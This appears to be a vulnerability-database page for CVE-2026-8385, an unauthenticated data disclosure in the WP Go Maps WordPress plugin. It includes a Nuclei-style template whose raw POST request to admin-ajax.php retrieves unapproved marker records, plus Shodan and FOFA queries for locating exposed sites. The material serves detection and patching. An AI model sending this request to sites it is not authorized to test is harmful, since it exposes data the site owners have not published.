| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2026-8385 | 14 Jun 202616:16 | – | circl | |
| CVE-2026-8385 | 15 Jun 202606:00 | – | cve | |
| CVE-2026-8385 WP Go Maps < 10.0.10 - Unauthenticated Sensitive Information Disclosure via Datatables AJAX Fallback | 15 Jun 202606:00 | – | cvelist | |
| EUVD-2026-36697 | 15 Jun 202606:00 | – | euvd | |
| CVE-2026-8385 | 15 Jun 202608:16 | – | nvd | |
| WordPress WP Go Maps – Google Maps, OpenStreetMap, Leaflet Map plugin <= 10.0.09 - Unauthenticated Sensitive Information Disclosure vulnerability | 5 Jun 202600:00 | – | patchstack | |
| PT-2026-49143 | 14 Jun 202600:00 | – | ptsecurity | |
| CVE-2026-8385 WP Go Maps < 10.0.10 - Unauthenticated Sensitive Information Disclosure via Datatables AJAX Fallback | 15 Jun 202606:00 | – | vulnrichment |
id: CVE-2026-8385
info:
name: WordPress WP Go Maps < 10.0.10 - Unauthenticated Marker Data Disclosure
author: 0x_Akoko
severity: medium
description: |
WP Go Maps WordPress plugin < 10.0.10 contains an information disclosure vulnerability caused by improper enforcement of marker approval filter in admin-ajax fallback for datatables route, letting unauthenticated visitors retrieve unapproved marker records.
impact: |
Unauthenticated attackers can access unapproved marker data including title, category, address, and description, leading to sensitive information disclosure.
remediation: |
Update to version 10.0.10 or later.
reference:
- https://wpscan.com/vulnerability/984cad38-6d01-4956-8bf1-29585258780b/
- https://nvd.nist.gov/vuln/detail/CVE-2026-8385
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2026-8385
cwe-id: CWE-200
metadata:
verified: true
max-request: 2
vendor: developer-developer
product: wp-google-maps
framework: wordpress
shodan-query: http.html:"wp-google-maps"
fofa-query: body="wp-google-maps"
tags: cve,cve2026,wordpress,wp-plugin,wp,wp-google-maps,exposure
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/wp-google-maps/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "WP Google Maps")'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wpgmza_rest_api_request&route=%2Fdatatables%2F&phpClass=WPGMZA%5CMarkerDataTable&map_id=1&length=10&start=0&draw=1
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "recordsTotal", "recordsFiltered", "address")'
condition: and
# digest: 4a0a00473045022100b4708a273237a79e42668b9eb0809620da65933880167c150681094cc7b25b3602206dcccd520bdd22b2b42eb2e17b84e0c47e41913466e4ec9101dd824990ec63a5:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation